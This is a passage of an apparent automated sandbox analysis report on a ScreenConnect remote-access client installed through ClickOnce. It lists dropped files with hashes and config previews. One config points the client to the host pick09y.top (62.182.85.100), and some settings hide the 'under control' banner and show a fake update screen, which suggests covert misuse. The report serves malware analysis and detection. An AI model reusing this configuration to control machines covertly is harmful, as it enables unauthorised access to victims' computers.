                                                                                                                                                                              SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                              SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                              SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95520
                                                                                                                                                                              Entropy (8bit):6.505346220942731
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                              MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                              SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                              SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                              SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Joe Sandbox View:
• Filename: statments.exe, Detection: malicious
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: sstatment.exe, Detection: malicious
• Filename: extukGiBrn.exe, Detection: malicious
• Filename: Vh0tTzx4Ko.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61216
                                                                                                                                                                              Entropy (8bit):6.31175789874945
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                              MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                              SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                              SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                              SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Joe Sandbox View:
• Filename: statments.exe, Detection: malicious
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: Scanned01Document_ms.exe, Detection: malicious
• Filename: sstatment.exe, Detection: malicious
• Filename: extukGiBrn.exe, Detection: malicious
• Filename: Vh0tTzx4Ko.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: support.Client.exe, Detection: malicious
• Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81696
                                                                                                                                                                              Entropy (8bit):5.862223562830496
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                              MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                              SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                              SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                              SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):548864
                                                                                                                                                                              Entropy (8bit):6.031251664661689
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1721856
                                                                                                                                                                              Entropy (8bit):6.639136400085158
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):601376
                                                                                                                                                                              Entropy (8bit):6.185921191564225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):197120
                                                                                                                                                                              Entropy (8bit):6.58476728626163
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                              Entropy (8bit):4.646296001566109
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                                                                                                              MD5:8B45555EF2300160892C25F453098AA4
                                                                                                                                                                              SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                                                                                                              SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                                                                                                              SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):21018
                                                                                                                                                                              Entropy (8bit):7.841465962209068
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                                                                                                              MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                                                                                                              SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                                                                                                              SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                                                                                                              SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):50133
                                                                                                                                                                              Entropy (8bit):4.759054454534641
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                              MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                              SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                              SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                              SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26722
                                                                                                                                                                              Entropy (8bit):7.7401940386372345
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3343
                                                                                                                                                                              Entropy (8bit):4.771733209240506
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                                                                                                              MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                                                                                                              SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                                                                                                              SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                                                                                                              SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):556
                                                                                                                                                                              Entropy (8bit):5.042876098095699
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+LCDzv/vXbAa3xT:2dL9hK6E46YPpz3vH
                                                                                                                                                                              MD5:4AC6371353CC59FE5C6E3319405BE7D9
                                                                                                                                                                              SHA1:14CB34BF608AC9B2F4574B67816A219BA953787D
                                                                                                                                                                              SHA-256:F0D7263254C0E2454667E262C923DE0458B26B7FFB6942E89DB544E1020A67B3
                                                                                                                                                                              SHA-512:4D1547FB53DD176906F2C0E1809E23E4D6E93BA6153BA4939179F383F26A45BC94314C88C66390340228D838034227562C16766C0722F5744731354E05508EBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2017%3a04%3a55</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):68096
                                                                                                                                                                              Entropy (8bit):6.068776675019683
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1373
                                                                                                                                                                              Entropy (8bit):5.369201792577388
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                              MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                              SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                              SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
